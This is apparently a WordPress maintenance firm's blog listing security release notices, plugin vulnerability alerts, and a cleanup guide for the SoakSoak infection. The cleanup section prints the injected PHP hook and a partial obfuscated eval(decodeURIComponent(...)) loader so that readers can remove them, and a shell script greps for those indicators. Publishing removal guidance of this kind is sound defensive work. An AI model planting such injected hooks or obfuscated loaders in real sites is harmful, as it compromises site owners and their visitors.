New Security Release: 4.2.4

Today, WordPress 4.2.4 was released as an important security fix. This update comes just one week after the release of WordPress 4.2.3.

4.2.3 caused quite a few issues for many sites because it changed the way WordPress handles shortcodes. Sites that relied on shortcodes to display content saw their formatting break. The release team gave little warning about this change, although it was necessary to close the cross-site scripting hole.

This update, 4.2.4, supposedly fixes the issue sites were having with 4.2.3, so many plugin and theme authors will be happy. It also addresses further cross-site scripting issues as well as a SQL injection vulnerability.

You should update your site right away, and always remember to back up your site before updating!

Read more here: http://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/

Important WordPress Security Release Today: 4.2.3

WordPress 4.2.3 was released today as an important security patch. There will not be any visual changes in this update (as with all other incremental WordPress updates), but it is extremely important to update to secure your site.

Specifically, the update addresses:

a cross-site scripting vulnerability, which could allow users with the Contributor or Author role to compromise a site.

Read more about it here.

All wpONcall members are already updated. Have you updated yet?

Security Alert: WooCommerce Vulnerability

Today, Sucuri announced a vulnerability in WooCommerce that has been patched in the most recent version. If you are using WooCommerce to power your WordPress e-commerce site, you need to update right away.

The vulnerability is quite serious and is related to a PayPal setting in WooCommerce. If you use PayPal as a payment gateway in WooCommerce, you are most likely vulnerable.

All wpONcall members have already been updated!

Update Your Plugins – XSS Vulnerability

Today, Sucuri announced a major security advisory for a few widely used WordPress plugins. The warning concerns cross-site scripting (XSS), which affects many popular plugins. All plugins affected by the XSS issue should be updated immediately to patch the vulnerability. The initial list of affected plugins is:

Even Jetpack, an official WordPress plugin, is vulnerable. All members of wpONcall are already updated and safe!


Massive WordPress Security Breach: SoakSoak

What Is It?

Over the weekend, more than 11,000 WordPress websites were blacklisted by Google because they were affected by SoakSoak. It is estimated that over 100,000 WordPress sites were compromised by the hack. Affected websites redirect visitors to the SoakSoak domain. You will see a page similar to this if you have been infected:

[Image: example of the SoakSoak redirect page]

What Can You Do to Protect Your Site?

It is not yet clear exactly where the vulnerability is being exploited, but it could be related to the Revolution Slider vulnerability we highlighted a few months ago. The best protection you can have is a completely updated WordPress core, updated plugins and secure backups of your site so you can fix the issue. You may also want to look into a service such as Sucuri, which can add a firewall to protect your site.

How Do I Fix It?

If you have been infected, you can do one of two things:

  1. Restore your website from a clean backup that has not been infected. This will erase the code that was inserted into your site causing the issue.
  2. If you do not have a backup available, you can manually clean the two infected files, which are part of the WordPress core:

1. wp-includes/template-loader.php
Remove this block of code:

<?php
// Injected by SoakSoak: registers the tampered swfobject.js so it loads on every page
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

2. wp-includes/js/swfobject.js
Remove this block of code:

eval(decodeURIComponent("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Once the code is removed, log in to Google Webmaster Tools and request a review of your site so it can be removed from the blacklist.
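Before editing either file by hand, it helps to confirm that the two modifications described above are actually present. The POSIX shell script below is an added example for this post (it is not wpONcall's or WordPress's code): it greps a site for the two SoakSoak indicators listed above, reports each one, and returns a non-zero status when anything is found. It assumes the site root is passed as the first argument with the standard wp-includes/ layout; the sample site tree it builds with make_sample_site is constructed for the example and the encoded payload in it is a placeholder. The final check, which looks for the same eval(decodeURIComponent(...)) loader in any other script under wp-includes/js, goes slightly beyond what the post lists.

```shell
#!/bin/sh
# Added example: read-only check for the two SoakSoak indicators described in the post.
# Assumes $1 is a WordPress root with the standard wp-includes/ layout. The sample
# tree produced by make_sample_site is constructed for this example only.

# scan_soaksoak WP_ROOT
# Prints one line per indicator found. Returns 0 when clean, 1 when infected.
scan_soaksoak() {
  root=$1
  found=0
  loader="$root/wp-includes/template-loader.php"
  swf="$root/wp-includes/js/swfobject.js"

  # Indicator 1: the injected FuncQueueObject() enqueue in template-loader.php.
  if [ -f "$loader" ] && grep -q 'FuncQueueObject' "$loader"; then
    echo "INFECTED: $loader - injected FuncQueueObject() enqueue"
    found=1
  fi

  # Indicator 2: the obfuscated eval(decodeURIComponent(...)) loader in swfobject.js.
  if [ -f "$swf" ] && grep -q 'eval(decodeURIComponent' "$swf"; then
    echo "INFECTED: $swf - obfuscated eval(decodeURIComponent(...)) loader"
    found=1
  fi

  # Beyond the post: the same loader dropped into any other script under
  # wp-includes/js (filenames containing spaces are not handled by this loop).
  for f in $(grep -rl 'eval(decodeURIComponent' "$root/wp-includes/js" 2>/dev/null \
             | grep -v '/swfobject\.js$'); do
    echo "SUSPICIOUS: $f - eval(decodeURIComponent(...)) outside swfobject.js"
    found=1
  done
  return $found
}

# make_sample_site clean|infected
# Builds a throwaway tree under mktemp and prints its path (constructed sample input).
make_sample_site() {
  dir=$(mktemp -d)
  mkdir -p "$dir/wp-includes/js"
  if [ "$1" = infected ]; then
    # Same two modifications the post tells you to remove; the encoded payload is
    # replaced by a placeholder so nothing executable is embedded here.
    cat > "$dir/wp-includes/template-loader.php" <<'EOF'
<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
EOF
    printf 'eval(decodeURIComponent("%%28%%0D%%0A...PLACEHOLDER..."));\n' \
      > "$dir/wp-includes/js/swfobject.js"
  else
    printf '<?php\n// constructed stand-in for a clean template-loader.php\n' \
      > "$dir/wp-includes/template-loader.php"
    printf '/* constructed stand-in for a clean swfobject.js */\n' \
      > "$dir/wp-includes/js/swfobject.js"
  fi
  echo "$dir"
}

# Demo run against a constructed infected tree.
demo=$(make_sample_site infected)
scan_soaksoak "$demo" || echo "-> cleanup needed: see the two files listed above"
rm -rf "$demo"
```

On a real install, call `scan_soaksoak /path/to/wordpress` instead of the demo tree. The script only reads files; it does not clean anything, because, as the post notes, the entry point was not yet known and restoring from a clean backup remains the safer fix than hand-editing core files.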

If you are a wpONcall client, we take care of this for you! Let us know if you have any questions.